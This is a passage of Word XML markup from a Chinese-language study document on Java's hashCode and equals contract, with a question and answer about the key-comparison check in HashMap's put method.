        <w:t>方法被重写，那么对象的</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也尽量重写，并且产生</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用的对象，一定要和</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法中使用的一致，否则就会违反上面提到的第</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00F41A4C" w:rsidRDefault="007C175D" w:rsidP="002D2519">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000367C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个对象的</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相同，并不一定表示两个对象就相同，也就是不一定适用于</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">equals(java.lang.Object) </w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，只能够说明这两个对象在散列存储结构中，如</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidR="002D2519" w:rsidRPr="002D2519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，他们“存放在同一个篮子里”。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A2524" w:rsidRPr="00A7236F" w:rsidRDefault="005A2524" w:rsidP="005A2524">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1.4.1 </w:t>
      </w:r>
      <w:r w:rsidR="00DB35DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重要资料</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00F41A4C" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00F41A4C" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00F41A4C" w:rsidRDefault="000A1305" w:rsidP="000A130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9" w:line="272" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>源码中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法里面判断链表里是否有相同的元素的时候是这么判断的：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>e.hash == hash &amp;&amp; ((k = e.key) == key || key.equals(k))</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>前面的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>e.hash == hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>还是可以理解的，但是后面为什么还要判断</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>k == key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>呢？或者说判断</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>k==key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>就行啦，总而言之，我觉得判断</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>e.hash == hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和判断</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>k==key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是一样的！谁能帮我解答下？很是疑惑啊</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>~~</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00F41A4C" w:rsidRDefault="000A1305" w:rsidP="000A130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36" w:line="272" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>嗯。有点明白，但还是不太清晰，能不能举个例子？？</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>还有个新的问题就是：为什么</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>类中不重写</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法，这样直接用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>key,value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>对象，然后用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>e.equals(newEntry)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>比较不是更好？？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00F41A4C" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00491E78" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="136" w:line="326" w:lineRule="atLeast"/>
        <w:ind w:firstLine="380"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>如果两个对象相同，那么它们的</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>值一定要相同，所以先</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>e.hash == hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，但是这个只是必要条件，而不是充分条件，也就是说，如果两个对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>相同，它们并不一定是同一个对象，所以后面还要</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>key.equals(k)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在第一部分</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hashmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的数据结构中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>annegu</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>就写了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法的过程：首先计算</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，找到数组中对应位置的某一元素，然后通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
